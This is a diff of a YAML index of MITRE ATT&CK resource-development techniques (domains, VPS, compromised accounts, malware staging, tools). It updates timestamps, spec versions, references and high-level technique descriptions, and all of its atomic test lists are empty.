       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52676,9 +53348,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52729,11 +53400,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52746,7 +53416,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52781,22 +53451,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -52817,7 +53490,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -52856,6 +53529,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52911,7 +53588,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -52969,7 +53645,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -53049,7 +53724,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -53109,7 +53783,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -53131,7 +53804,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53150,42 +53823,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53194,22 +53835,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53223,7 +53895,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -53310,11 +53982,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53374,7 +54045,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53416,7 +54086,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53431,7 +54101,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53522,11 +54191,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53559,15 +54227,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53651,7 +54320,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53705,7 +54373,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53756,36 +54423,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53794,21 +54435,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -53854,17 +54521,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -53890,7 +54556,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -53922,8 +54588,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -53950,7 +54614,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53974,8 +54638,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -54001,7 +54663,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:47:46.409Z'
       name: Install Digital Certificate
       description: "Adversaries may install SSL/TLS certificates that can be used
         during targeting. SSL/TLS certificates are files that can be installed on
@@ -54035,8 +54697,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.002:
     technique:
@@ -54084,7 +54744,7 @@ resource-development:
         Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
 
         By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:22:13.578Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: DNS Server
       x_mitre_detection: |-
@@ -54100,7 +54760,6 @@ resource-development:
       - 'Domain Name: Passive DNS'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585:
     technique:
@@ -54159,54 +54818,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
-      type: attack-pattern
-      created: '2020-10-01T01:56:24.776Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588
-        url: https://attack.mitre.org/techniques/T1588
-      - source_name: NationsBuying
-        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
-          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
-        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
-      - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
-        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
-          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
-          Human Rights Defender. Retrieved December 12, 2016.'
